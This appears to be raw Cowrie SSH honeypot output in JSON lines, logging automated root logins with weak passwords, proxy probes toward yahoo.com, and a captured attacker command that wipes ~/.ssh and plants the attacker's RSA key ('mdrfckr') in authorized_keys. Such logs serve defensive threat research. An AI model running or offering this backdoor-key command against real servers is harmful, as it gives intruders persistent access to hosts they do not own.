{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.420862Z","src_ip":"213.209.150.239","session":"08389e295fda"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.467811Z","src_ip":"213.209.150.239","session":"08389e295fda"}
{"eventid":"cowrie.login.success","username":"root","password":"Hy123456","message":"login attempt [root/Hy123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.524460Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.703098Z","src_ip":"213.209.150.239","session":"08389e295fda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11409,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11409","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.751081Z","session":"08389e295fda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.798252Z","src_ip":"213.209.150.239","session":"08389e295fda"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":27768,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:27768","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.933776Z","session":"08389e295fda"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:57.980899Z","src_ip":"213.209.150.239","session":"08389e295fda"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.028976Z","src_ip":"213.209.150.239","session":"08389e295fda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:57:58.082374Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.083353Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.084355Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62413,"dst_ip":"1.2.3.4","dst_port":22,"session":"271d20f052a6","protocol":"ssh","message":"New connection: 213.209.150.239:62413 (1.2.3.4:22) [session: 271d20f052a6]","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.085742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.086483Z","src_ip":"213.209.150.239","session":"271d20f052a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.143019Z","src_ip":"213.209.150.239","session":"271d20f052a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.354080Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.425147Z","src_ip":"213.209.150.239","session":"271d20f052a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":24195,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:24195","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.482942Z","session":"271d20f052a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.539812Z","src_ip":"213.209.150.239","session":"271d20f052a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14260,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14260","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.695279Z","session":"271d20f052a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.752398Z","src_ip":"213.209.150.239","session":"271d20f052a6"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.809738Z","src_ip":"213.209.150.239","session":"271d20f052a6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62456,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdd3969844f0","protocol":"ssh","message":"New connection: 213.209.150.239:62456 (1.2.3.4:22) [session: fdd3969844f0]","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.865087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.865953Z","src_ip":"213.209.150.239","session":"fdd3969844f0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:58.922248Z","src_ip":"213.209.150.239","session":"fdd3969844f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:57:59.079899Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.080597Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.349811Z","src_ip":"213.209.150.239","session":"fdd3969844f0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.351399Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.352141Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":22534,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:22534","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.407045Z","session":"fdd3969844f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.463828Z","src_ip":"213.209.150.239","session":"fdd3969844f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":23026,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:23026","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.618629Z","session":"fdd3969844f0"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":43640,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ce5efc8a125","protocol":"ssh","message":"New connection: 27.112.78.170:43640 (1.2.3.4:22) [session: 6ce5efc8a125]","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.621530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.622201Z","src_ip":"27.112.78.170","session":"6ce5efc8a125"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.675170Z","src_ip":"213.209.150.239","session":"fdd3969844f0"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.732616Z","src_ip":"213.209.150.239","session":"fdd3969844f0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62524,"dst_ip":"1.2.3.4","dst_port":22,"session":"645fb5226ffe","protocol":"ssh","message":"New connection: 213.209.150.239:62524 (1.2.3.4:22) [session: 645fb5226ffe]","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.787997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.789027Z","src_ip":"213.209.150.239","session":"645fb5226ffe"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.845434Z","src_ip":"213.209.150.239","session":"645fb5226ffe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:57:59.883332Z","src_ip":"27.112.78.170","session":"6ce5efc8a125"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.127948Z","src_ip":"213.209.150.239","session":"645fb5226ffe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":23253,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:23253","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.185743Z","session":"645fb5226ffe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.242419Z","src_ip":"213.209.150.239","session":"645fb5226ffe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11234,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11234","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.399081Z","session":"645fb5226ffe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.455441Z","src_ip":"213.209.150.239","session":"645fb5226ffe"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.512761Z","src_ip":"213.209.150.239","session":"645fb5226ffe"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62571,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea5a77cac79b","protocol":"ssh","message":"New connection: 213.209.150.239:62571 (1.2.3.4:22) [session: ea5a77cac79b]","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.558851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:00.559559Z","src_ip":"213.209.150.239","session":"ea5a77cac79b"}
